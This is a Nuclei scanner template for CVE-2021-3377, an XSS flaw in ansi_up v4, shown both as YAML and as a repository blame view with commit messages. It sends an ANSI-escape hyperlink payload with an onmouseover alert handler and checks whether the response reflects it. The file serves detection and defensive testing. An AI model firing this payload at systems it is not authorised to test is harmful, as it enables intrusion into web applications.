nuclei-templates/cves/2021/CVE-2021-3377.yaml

id: CVE-2021-3377

info:
  name: Ansi_up XSS
  description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
  reference:
    - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
    - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
  author: geeknik
  severity: medium
  tags: cve,cve2021,xss,npm
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-3377
    cwe-id: CWE-79

requests:
  - raw:
      - |+
        GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        words:
          - "com\"/onmouseover=\"alert(1)\">"
More CVEs Template 2021-07-26 17:18:45 +00:00			`id: CVE-2021-3377`

			`info:`
			`name: Ansi_up XSS`
			`description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf`
			`- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27`
More CVEs Template 2021-07-26 17:18:45 +00:00			`author: geeknik`
			`severity: medium`
Coverage for all templates using tags 2021-09-09 13:38:13 +00:00			`tags: cve,cve2021,xss,npm`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.10`
			`cve-id: CVE-2021-3377`
			`cwe-id: CWE-79`
More CVEs Template 2021-07-26 17:18:45 +00:00
			`requests:`
			`- raw:`
			`- \|+`
			`GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: close`

			`unsafe: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

			`- type: word`
			`words:`
			`- "com\"/onmouseover=\"alert(1)\">"`